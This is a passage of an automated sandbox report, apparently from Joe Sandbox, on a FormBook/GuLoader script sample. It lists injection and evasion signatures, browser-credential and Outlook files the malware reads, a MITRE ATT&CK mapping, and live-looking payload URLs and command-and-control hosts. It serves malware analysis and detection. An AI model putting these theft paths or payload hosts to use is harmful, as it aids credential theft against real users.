          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information11
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		11
          Scripting          		1
          Abuse Elevation Control Mechanism          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		3
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		LSASS Memory114
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		Logon Script (Windows)511
          Process Injection          		3
          Obfuscated Files or Information          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell          		Login HookLogin Hook1
          Software Packing          		NTDS1
          Process Discovery          		Distributed Component Object ModelInput Capture5
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
          Process Injection          		Proc Filesystem1
          System Network Configuration Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526385 Sample: Narudzba ACH0036173.vbe Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 43 www.casesrep.site 2->43 45 casesrep.site 2->45 47 3 other IPs or domains 2->47 63 Suricata IDS alerts for network traffic 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 6 other signatures 2->69 10 powershell.exe 18 2->10         started        13 wscript.exe 1 2->13         started        signatures3 process4 signatures5 77 Early bird code injection technique detected 10->77 79 Writes to foreign memory regions 10->79 81 Found suspicious powershell code related to unpacking or dynamic code loading 10->81 83 Queues an APC in another process (thread injection) 10->83 15 msiexec.exe 6 10->15         started        18 conhost.exe 10->18         started        85 Suspicious powershell command line found 13->85 87 Wscript starts Powershell (via cmd or directly) 13->87 89 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->89 91 Suspicious execution chain found 13->91 20 powershell.exe 14 18 13->20         started        23 cmd.exe 1 13->23         started        process6 dnsIp7 93 Maps a DLL or memory area into another process 15->93 25 HTiDHBMqChwMbO.exe 15->25 injected 49 pub-2f7d07153ea1403184d62266d9c28e41.r2.dev 162.159.140.237, 443, 49730, 49737 CLOUDFLARENETUS United States 20->49 95 Found suspicious powershell code related to unpacking or dynamic code loading 20->95 28 conhost.exe 20->28         started        97 Uses ping.exe to check the status of other devices and networks 23->97 30 conhost.exe 23->30         started        32 PING.EXE 1 23->32         started        signatures8 process9 signatures10 73 Maps a DLL or memory area into another process 25->73 75 Found direct / indirect Syscall (likely to bypass EDR) 25->75 34 msinfo32.exe 13 25->34         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 34->55 57 Tries to harvest and steal browser information (history, passwords, etc) 34->57 59 Modifies the context of a thread in another process (thread injection) 34->59 61 2 other signatures 34->61 37 HTiDHBMqChwMbO.exe 34->37 injected 41 firefox.exe 34->41         started        process13 dnsIp14 51 casesrep.site 84.32.84.32, 49946, 50005, 50006 NTT-LT-ASLT Lithuania 37->51 53 www.kuaimaolife.shop 38.55.251.233, 50009, 50010, 80 COGENT-174US United States 37->53 71 Found direct / indirect Syscall (likely to bypass EDR) 37->71 signatures15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Narudzba ACH0036173.vbe26%ReversingLabsScript-WScript.Trojan.GuLoader
          Narudzba ACH0036173.vbe11%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          pub-2f7d07153ea1403184d62266d9c28e41.r2.dev0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://aka.ms/pscore6lB0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
          http://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev0%VirustotalBrowse
          https://github.com/Pester/Pester1%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
          		162.159.140.237
          		truefalseunknown
          casesrep.site
          		84.32.84.32
          		truetrue
            		unknown
            www.kuaimaolife.shop
            		38.55.251.233
            		truefalse
              		unknown
              www.casesrep.site
              		unknown
              		unknowntrue
                		unknown
                6777.6777.6777.677e
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msofalse
                    		unknown
                    https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.binfalse
                      		unknown
                      http://www.casesrep.site/7z6q/true
                        		unknown
                        http://www.kuaimaolife.shop/80e1/false
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msoPpowershell.exe, 00000004.00000002.1839361378.0000020AE34AB000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://go.micropowershell.exe, 00000004.00000002.1839361378.0000020AE3E41000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bin$Ymsiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://pub-2f7d07153ea1403184d62266d9c28e41.r2.devpowershell.exe, 00000004.00000002.1839361378.0000020AE5009000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bingmsiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/Mmsiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2017385313.00000000048B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://pub-2f7d07153ea1403184d62266d9c28e41.r2.devpowershell.exe, 00000004.00000002.1839361378.0000020AE4CB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1839361378.0000020AE34AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://contoso.com/powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 00000004.00000002.1839361378.0000020AE3281000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1839361378.0000020AE3281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2017385313.00000000048B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.binEmsiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msoXRpowershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          162.159.140.237
                                          		pub-2f7d07153ea1403184d62266d9c28e41.r2.devUnited States
                                          		13335CLOUDFLARENETUSfalse
                                          84.32.84.32
                                          		casesrep.siteLithuania
                                          		33922NTT-LT-ASLTtrue
                                          38.55.251.233
                                          		www.kuaimaolife.shopUnited States
                                          		174COGENT-174USfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1526385
                                          Start date and time:2024-10-05 14:48:46 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 9m 35s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:15
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:2
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Narudzba ACH0036173.vbe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.expl.evad.winVBE@17/8@4/3
                                          EGA Information:
                                          • Successful, ratio: 40%
                                          HCA Information:
                                          • Successful, ratio: 83%
                                          • Number of executed functions: 113
                                          • Number of non-executed functions: 185
                                          Cookbook Comments:
                                          • Found application associated with file extension: .vbe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 1068 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 5812 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          08:49:44API Interceptor84x Sleep call for process: powershell.exe modified
                                          08:51:37API Interceptor6x Sleep call for process: msinfo32.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          162.159.140.237http://pub-0ae50a4c573c409f93585499aeac650f.r2.dev/cvbnmkjh.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • pub-0ae50a4c573c409f93585499aeac650f.r2.dev/cvbnmkjh.html
                                          http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html
                                          http://pub-ca8a3ace07094ee9967971c12a96a935.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • pub-ca8a3ace07094ee9967971c12a96a935.r2.dev/index.html
                                          http://pub-6f594b43277e4071a0c14266387a1ea8.r2.dev/fdsaghjk.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • pub-6f594b43277e4071a0c14266387a1ea8.r2.dev/fdsaghjk.html
                                          http://pub-d2dba8f127424f0cb0341658081256fa.r2.dev/kjhdishs.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • pub-d2dba8f127424f0cb0341658081256fa.r2.dev/kjhdishs.html
                                          http://pub-64fd1e2750a4440ab4fe49fc5a421a35.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • pub-64fd1e2750a4440ab4fe49fc5a421a35.r2.dev/index.html
                                          http://pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.html
                                          http://pub-9a2fba40e7084a1eb9d96885ba6cecf2.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • pub-9a2fba40e7084a1eb9d96885ba6cecf2.r2.dev/index.html
                                          http://pub-a5dea08759934238bd2363b86fdeed1a.r2.dev/makinsalin.htmlGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                          • pub-a5dea08759934238bd2363b86fdeed1a.r2.dev/makinsalin.html
                                          http://pub-783fdf92836240fa96dda87e23c5c881.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • pub-783fdf92836240fa96dda87e23c5c881.r2.dev/index.html
                                          84.32.84.32-pdf.bat.exeGet hashmaliciousFormBookBrowse
                                          • www.dfmagazine.shop/7k8f/
                                          DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                          • www.agilizeimob.app/bnrj/
                                          Order.exeGet hashmaliciousFormBookBrowse
                                          • www.servehimfoundation.org/wlo5/
                                          Quote #260924.exeGet hashmaliciousFormBookBrowse
                                          • www.thepeatear.online/lu5k/
                                          Order 001-1.exeGet hashmaliciousFormBookBrowse
                                          • www.servehimfoundation.org/wlo5/
                                          Product Data Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                          • www.dfmagazine.shop/wc8m/?fRr0=tfAptZ&Z0=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhMc0vkrsKf8OYx9AcoiAA17H2AQJPV0Zg3KmaIPVvP4iA0nhUXGrqtBT
                                          PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.agilizeimob.app/zkp2/
                                          UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.dfmagazine.shop/7k8f/
                                          QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                          • www.dfmagazine.shop/wc8m/?vlJ0J=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhLN2h2DTK9csfh9AcreeAGSJ1TcJEV0fpWOmE9rV6P4iWQH1GQ0=&HDJP=Pnl8G6jPyrn
                                          PO23100072.exeGet hashmaliciousFormBookBrowse
                                          • www.agilizeimob.app/we8s/
                                          38.55.251.233Revised Invoice H000127896.exeGet hashmaliciousFormBookBrowse
                                          • www.kuaimaolife.shop/j39u/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          www.kuaimaolife.shopRevised Invoice H000127896.exeGet hashmaliciousFormBookBrowse
                                          • 38.55.251.233

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          NTT-LT-ASLThttp://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                          • 84.32.84.33
                                          GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                          • 84.32.44.139
                                          -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                          • 84.32.84.32
                                          BDncqpUxZl.dllGet hashmaliciousBumbleBeeBrowse
                                          • 84.32.84.32
                                          Midjourney.msiGet hashmaliciousUnknownBrowse
                                          • 84.32.84.32
                                          BDncqpUxZl.dll.dllGet hashmaliciousBumbleBeeBrowse
                                          • 84.32.84.32
                                          Midjourney.msiGet hashmaliciousUnknownBrowse
                                          • 84.32.84.32
                                          DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                          • 84.32.84.32
                                          Report-41952.lnkGet hashmaliciousUnknownBrowse
                                          • 84.32.84.32
                                          PO#001498.exeGet hashmaliciousFormBookBrowse
                                          • 84.32.84.32
                                          COGENT-174US81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          • 143.244.42.106
                                          https://jhansalazar.weebly.com/Get hashmaliciousUnknownBrowse
                                          • 38.91.45.7
                                          -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                          • 38.47.207.146
                                          BDncqpUxZl.dllGet hashmaliciousBumbleBeeBrowse
                                          • 38.180.144.181
                                          Midjourney.msiGet hashmaliciousUnknownBrowse
                                          • 38.180.144.181
                                          https://ahchoadeegu.homes?u=k8pp605&o=c9ewtnr&t=8845Get hashmaliciousUnknownBrowse
                                          • 38.180.68.202
                                          http://Warehousingpro.comGet hashmaliciousUnknownBrowse
                                          • 170.75.167.85
                                          BDncqpUxZl.dll.dllGet hashmaliciousBumbleBeeBrowse
                                          • 38.180.144.181
                                          Midjourney.msiGet hashmaliciousUnknownBrowse
                                          • 38.180.144.181
                                          DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                          • 38.47.233.65
                                          CLOUDFLARENETUSWindows PowerShell.lnkGet hashmaliciousUnknownBrowse
                                          • 104.25.234.53
                                          c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          XWorm.exeGet hashmaliciousLummaCBrowse
                                          • 188.114.96.3
                                          bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                          • 104.21.86.200
                                          S4dd5N5VuJ.lnkGet hashmaliciousUnknownBrowse
                                          • 172.67.188.77
                                          Iv7LiW8Jwu.lnkGet hashmaliciousUnknownBrowse
                                          • 172.67.143.87
                                          Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          https://wide-loads.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                          • 104.18.2.157
                                          https://cedars-sinai-enterprise.dicomgrid.com/worklist/Get hashmaliciousUnknownBrowse
                                          • 104.18.17.5
                                          rfc[1].htmlGet hashmaliciousUnknownBrowse
                                          • 172.67.41.60

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0eWindows PowerShell.lnkGet hashmaliciousUnknownBrowse
                                          • 162.159.140.237
                                          sj9eYmr725.exeGet hashmaliciousQuasarBrowse
                                          • 162.159.140.237
                                          iOD95iHt4G.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.140.237
                                          iOD95iHt4G.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.140.237
                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                          • 162.159.140.237
                                          8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                          • 162.159.140.237
                                          hkN23TcCdh.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.140.237
                                          Iv7LiW8Jwu.lnkGet hashmaliciousUnknownBrowse
                                          • 162.159.140.237
                                          hkN23TcCdh.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.140.237
                                          Tcbnyqc7Cr.exeGet hashmaliciousDCRatBrowse
                                          • 162.159.140.237
                                          37f463bf4616ecd445d4a1937da06e19file.dllGet hashmaliciousMatanbuchusBrowse
                                          • 162.159.140.237
                                          rpedido-00035.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 162.159.140.237
                                          w2TxCv1zA8.msiGet hashmaliciousUnknownBrowse
                                          • 162.159.140.237
                                          RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                                          • 162.159.140.237
                                          RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                                          • 162.159.140.237
                                          Setup.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.140.237
                                          App_installer32_64x.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 162.159.140.237
                                          setup_run.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 162.159.140.237
                                          presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 162.159.140.237
                                          -pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                          • 162.159.140.237

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):8003
                                          Entropy (8bit):4.840877972214509
                                          Encrypted:false
                                          SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                          MD5:106D01F562D751E62B702803895E93E0
                                          SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                          SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                          SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
